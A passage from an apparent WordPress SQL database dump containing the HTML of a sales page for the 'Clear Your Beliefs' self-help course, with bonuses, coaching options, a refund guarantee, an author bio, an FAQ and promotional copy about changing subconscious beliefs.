wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="s20">Praise for Lion and Clear Your Beliefs</h1>\r\n[Place all testimonials here, in a wide box]\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n\r\nOR\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-20 19:28:17', '2014-06-21 00:28:17', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1058, 4194, '2014-06-24 15:59:00', '2014-06-24 20:59:00', '<div style="width: 125%; margin-left: -80px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset 